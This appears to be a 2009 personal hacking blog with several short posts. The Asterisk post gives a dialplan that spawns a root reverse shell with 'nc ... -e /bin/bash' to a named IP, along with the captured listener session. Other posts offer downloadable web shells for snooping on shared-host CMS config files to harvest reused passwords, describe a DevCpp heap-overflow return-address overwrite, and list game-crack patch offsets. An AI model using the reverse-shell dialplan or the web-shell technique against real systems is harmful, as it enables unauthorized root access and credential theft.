About

Posted on April 15th, 2009 by admin

welcome to my little blog!
i don't really expect anybody to actually ever read this, so i'll just use it to publish some of the lesser InfoSec related evils i know i'll get up to...
buckle up for here it is:

Back Up

The Blunt Shell In Perl

Posted on November 7th, 2009 by admin

experienced epic fail yesterday because i didn't have a perl version of the blunt shell. obviously this required immediate fixing...

Back Up     Download

The Blunt Shell

Posted on September 18th, 2009 by admin

the evils of shared webhosting!
php without safemode is a hazard... the blunt shell attached to this post is a little script i cooked up last night that demonstrates this quite nicely. you want to check out CMS config files for example... had a lot of phun with it. you'd be surprised how many people reuse passwords.

Back Up     Download

Asterisk Security

Posted on August 17th, 2009 by admin

asterisk runs as root by default. if you can create your own dialplans then you might wanna check out the System() method ... 

[george-pentest]
exten => 666,1,Answer
exten => 666,2,System(nc 146.231.123.57 80 -e '/bin/bash')
exten => 666,3,Hangup
...
D:\Documents and Settings\g05p3292>nc -l -p  80
whoami
root
^C
D:\Documents and Settings\g05p3292>

Back Up

DevCpp Heap Overflow

Posted on June 14h, 2009 by admin

the other day i was reading an eZine in DevCpp 4.9.9.2 - don't ask me why...
when i came accross this little critter:
#include lines with more than 0x8007 chars trigger it. 

              loc_401CC4:   ; CODE XREF: sub_401C6C+1Ej
CODE:00401CC4                 mov     eax, [eax]
CODE:00401CC6                 mov     [edx], eax   
CODE:00401CC8                 mov     [eax+4], edx
CODE:00401CCB
CODE:00401CCB loc_401CCB:   ; CODE XREF: sub_401C6C+39j
CODE:00401CCB                 pop     ebx
CODE:00401CCC                 retn
CODE:00401CCC sub_401C6C      endp
because we control eax and edx at this point we can write an arbitrary 4 bytes to anywhere in mem. so i chose to just alter the return addr on the stack and let the retn do the rest. because of the instruction @00401CC8 we must take care what addr to use, since we will 'execute' its bytes upon redirection.

Back Up

Crimsonland Immortality Crack

Posted on April 17th, 2009 by admin

crimsonland is a fantastic little game that will provide you with countless hours of fun. last year my digsmate dean and i had a survival mode competetion and we eventually reached scores of about 5 million (the pulse gun is more powerful than you might expect!). after we had reached the maximum scores that we consider humanly possible i started looking into creating an immortality crack just to see how hectic the game can get. a couple of hours with w32dasm v10 revealed the following offsets in the executable:
0x4255B6 - replace by jmp instruction -> no injury through touch
0x426A14 - invert jump instruction -> monsters die when they touch the player
0x426AC2 - nop out the sub instruction -> prevent injury from shots
here's an in-game screenshot of the crack in action:

the only way to actually still die is to select some sort of suicide perk.
have fun!

Back Up